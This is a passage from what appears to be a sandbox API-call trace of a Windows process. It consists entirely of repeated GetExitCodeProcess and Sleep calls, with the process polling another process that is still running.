(dwMilliseconds=0x19) [0120.554] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.554] Sleep (dwMilliseconds=0x19) [0120.842] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.843] Sleep (dwMilliseconds=0x19) [0120.960] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0120.960] Sleep (dwMilliseconds=0x19) [0121.031] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.031] Sleep (dwMilliseconds=0x19) [0121.098] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.098] Sleep (dwMilliseconds=0x19) [0121.163] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.163] Sleep (dwMilliseconds=0x19) [0121.212] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.213] Sleep (dwMilliseconds=0x19) [0121.423] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.424] Sleep (dwMilliseconds=0x19) [0121.468] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.468] Sleep (dwMilliseconds=0x19) [0121.543] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.543] Sleep (dwMilliseconds=0x19) [0121.962] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0121.962] Sleep (dwMilliseconds=0x19) [0122.035] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.035] Sleep (dwMilliseconds=0x19) [0122.106] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.106] Sleep (dwMilliseconds=0x19) [0122.218] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.218] Sleep (dwMilliseconds=0x19) [0122.335] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.335] Sleep (dwMilliseconds=0x19) [0122.404] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.404] Sleep (dwMilliseconds=0x19) [0122.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.477] Sleep (dwMilliseconds=0x19) [0122.521] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.522] Sleep (dwMilliseconds=0x19) [0122.593] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.593] Sleep (dwMilliseconds=0x19) [0122.666] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.666] Sleep (dwMilliseconds=0x19) [0122.749] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.749] Sleep (dwMilliseconds=0x19) [0122.901] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.901] Sleep (dwMilliseconds=0x19) [0122.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0122.973] Sleep (dwMilliseconds=0x19) [0123.054] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.054] Sleep (dwMilliseconds=0x19) [0123.142] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.142] Sleep (dwMilliseconds=0x19) [0123.227] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.227] Sleep (dwMilliseconds=0x19) [0123.332] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.332] Sleep (dwMilliseconds=0x19) [0123.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.403] Sleep (dwMilliseconds=0x19) [0123.477] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.477] Sleep (dwMilliseconds=0x19) [0123.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.576] Sleep (dwMilliseconds=0x19) [0123.662] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.662] Sleep (dwMilliseconds=0x19) [0123.907] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0123.907] Sleep (dwMilliseconds=0x19) [0124.022] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.023] Sleep (dwMilliseconds=0x19) [0124.109] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.110] Sleep (dwMilliseconds=0x19) [0124.183] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.183] Sleep (dwMilliseconds=0x19) [0124.254] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.254] Sleep (dwMilliseconds=0x19) [0124.348] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.348] Sleep (dwMilliseconds=0x19) [0124.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.440] Sleep (dwMilliseconds=0x19) [0124.556] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.556] Sleep (dwMilliseconds=0x19) [0124.642] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.642] Sleep (dwMilliseconds=0x19) [0124.755] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0124.755] Sleep (dwMilliseconds=0x19) [0125.131] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.131] Sleep (dwMilliseconds=0x19) [0125.253] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.253] Sleep (dwMilliseconds=0x19) [0125.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.403] Sleep (dwMilliseconds=0x19) [0125.520] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.520] Sleep (dwMilliseconds=0x19) [0125.598] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.598] Sleep (dwMilliseconds=0x19) [0125.670] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.670] Sleep (dwMilliseconds=0x19) [0125.910] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.910] Sleep (dwMilliseconds=0x19) [0125.985] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0125.985] Sleep (dwMilliseconds=0x19) [0126.148] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0126.148] Sleep (dwMilliseconds=0x19) [0126.343] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0126.343] Sleep (dwMilliseconds=0x19) [0126.644] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0126.644] Sleep (dwMilliseconds=0x19) [0127.222] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0127.222] Sleep (dwMilliseconds=0x19) [0127.440] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0127.440] Sleep (dwMilliseconds=0x19) [0127.537] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0127.537] Sleep (dwMilliseconds=0x19) [0127.983] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.070] Sleep (dwMilliseconds=0x19) [0128.314] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.315] Sleep (dwMilliseconds=0x19) [0128.485] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.486] Sleep (dwMilliseconds=0x19) [0128.562] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.563] Sleep (dwMilliseconds=0x19) [0128.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.711] Sleep (dwMilliseconds=0x19) [0128.886] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.887] Sleep (dwMilliseconds=0x19) [0128.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0128.939] Sleep (dwMilliseconds=0x19) [0129.000] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.000] Sleep (dwMilliseconds=0x19) [0129.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.205] Sleep (dwMilliseconds=0x19) [0129.270] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.271] Sleep (dwMilliseconds=0x19) [0129.411] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.411] Sleep (dwMilliseconds=0x19) [0129.501] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.501] Sleep (dwMilliseconds=0x19) [0129.547] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.547] Sleep (dwMilliseconds=0x19) [0129.597] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.597] Sleep (dwMilliseconds=0x19) [0129.708] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.708] Sleep (dwMilliseconds=0x19) [0129.943] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.943] Sleep (dwMilliseconds=0x19) [0129.996] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0129.996] Sleep (dwMilliseconds=0x19) [0130.061] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.061] Sleep (dwMilliseconds=0x19) [0130.129] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.129] Sleep (dwMilliseconds=0x19) [0130.258] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.258] Sleep (dwMilliseconds=0x19) [0130.331] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.331] Sleep (dwMilliseconds=0x19) [0130.418] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.418] Sleep (dwMilliseconds=0x19) [0130.592] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.592] Sleep (dwMilliseconds=0x19) [0130.731] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.731] Sleep (dwMilliseconds=0x19) [0130.960] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0130.960] Sleep (dwMilliseconds=0x19) [0131.028] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.028] Sleep (dwMilliseconds=0x19) [0131.197] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.197] Sleep (dwMilliseconds=0x19) [0131.240] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.240] Sleep (dwMilliseconds=0x19) [0131.285] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.285] Sleep (dwMilliseconds=0x19) [0131.341] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.341] Sleep (dwMilliseconds=0x19) [0131.383] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.383] Sleep (dwMilliseconds=0x19) [0131.429] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.429] Sleep (dwMilliseconds=0x19) [0131.465] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.465] Sleep (dwMilliseconds=0x19) [0131.518] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.518] Sleep (dwMilliseconds=0x19) [0131.560] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.560] Sleep (dwMilliseconds=0x19) [0131.597] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.597] Sleep (dwMilliseconds=0x19) [0131.642] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.642] Sleep (dwMilliseconds=0x19) [0131.688] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.688] Sleep (dwMilliseconds=0x19) [0131.749] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.749] Sleep (dwMilliseconds=0x19) [0131.976] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0131.977] Sleep (dwMilliseconds=0x19) [0132.114] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.114] Sleep (dwMilliseconds=0x19) [0132.170] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.171] Sleep (dwMilliseconds=0x19) [0132.214] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.214] Sleep (dwMilliseconds=0x19) [0132.263] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.263] Sleep (dwMilliseconds=0x19) [0132.303] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.303] Sleep (dwMilliseconds=0x19) [0132.381] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.381] Sleep (dwMilliseconds=0x19) [0132.454] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.454] Sleep (dwMilliseconds=0x19) [0132.490] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.490] Sleep (dwMilliseconds=0x19) [0132.549] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.550] Sleep (dwMilliseconds=0x19) [0132.601] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.601] Sleep (dwMilliseconds=0x19) [0132.646] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.646] Sleep (dwMilliseconds=0x19) [0132.711] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.711] Sleep (dwMilliseconds=0x19) [0132.759] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.759] Sleep (dwMilliseconds=0x19) [0132.961] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0132.961] Sleep (dwMilliseconds=0x19) [0133.044] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.044] Sleep (dwMilliseconds=0x19) [0133.143] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.143] Sleep (dwMilliseconds=0x19) [0133.270] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.270] Sleep (dwMilliseconds=0x19) [0133.319] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.319] Sleep (dwMilliseconds=0x19) [0133.360] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.360] Sleep (dwMilliseconds=0x19) [0133.403] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.403] Sleep (dwMilliseconds=0x19) [0133.569] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.569] Sleep (dwMilliseconds=0x19) [0133.685] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.685] Sleep (dwMilliseconds=0x19) [0133.761] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.761] Sleep (dwMilliseconds=0x19) [0133.942] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.942] Sleep (dwMilliseconds=0x19) [0133.988] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0133.988] Sleep (dwMilliseconds=0x19) [0134.040] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.040] Sleep (dwMilliseconds=0x19) [0134.131] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.132] Sleep (dwMilliseconds=0x19) [0134.236] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.236] Sleep (dwMilliseconds=0x19) [0134.302] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.302] Sleep (dwMilliseconds=0x19) [0134.341] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.341] Sleep (dwMilliseconds=0x19) [0134.447] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.447] Sleep (dwMilliseconds=0x19) [0134.486] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.486] Sleep (dwMilliseconds=0x19) [0134.534] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.535] Sleep (dwMilliseconds=0x19) [0134.623] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.623] Sleep (dwMilliseconds=0x19) [0134.665] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.665] Sleep (dwMilliseconds=0x19) [0134.717] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.717] Sleep (dwMilliseconds=0x19) [0134.764] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.764] Sleep (dwMilliseconds=0x19) [0134.808] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.808] Sleep (dwMilliseconds=0x19) [0134.994] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0134.995] Sleep (dwMilliseconds=0x19) [0135.070] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.074] Sleep (dwMilliseconds=0x19) [0135.162] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.164] Sleep (dwMilliseconds=0x19) [0135.200] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.200] Sleep (dwMilliseconds=0x19) [0135.304] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.304] Sleep (dwMilliseconds=0x19) [0135.352] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.353] Sleep (dwMilliseconds=0x19) [0135.411] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.412] Sleep (dwMilliseconds=0x19) [0135.463] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.464] Sleep (dwMilliseconds=0x19) [0135.522] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.522] Sleep (dwMilliseconds=0x19) [0135.591] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.591] Sleep (dwMilliseconds=0x19) [0135.660] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.660] Sleep (dwMilliseconds=0x19) [0135.815] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.815] Sleep (dwMilliseconds=0x19) [0135.926] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.926] Sleep (dwMilliseconds=0x19) [0135.998] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0135.998] Sleep (dwMilliseconds=0x19) [0136.151] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.151] Sleep (dwMilliseconds=0x19) [0136.246] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.246] Sleep (dwMilliseconds=0x19) [0136.316] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.316] Sleep (dwMilliseconds=0x19) [0136.431] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.431] Sleep (dwMilliseconds=0x19) [0136.479] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.479] Sleep (dwMilliseconds=0x19) [0136.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.576] Sleep (dwMilliseconds=0x19) [0136.616] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.619] Sleep (dwMilliseconds=0x19) [0136.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.656] Sleep (dwMilliseconds=0x19) [0136.694] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0136.694] Sleep (dwMilliseconds=0x19) [0137.272] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.272] Sleep (dwMilliseconds=0x19) [0137.377] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.377] Sleep (dwMilliseconds=0x19) [0137.414] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0137.414] Sleep (dwMilliseconds=0x19) [0137.463] GetExitCodeProcess (in: hProcess=0x40c, 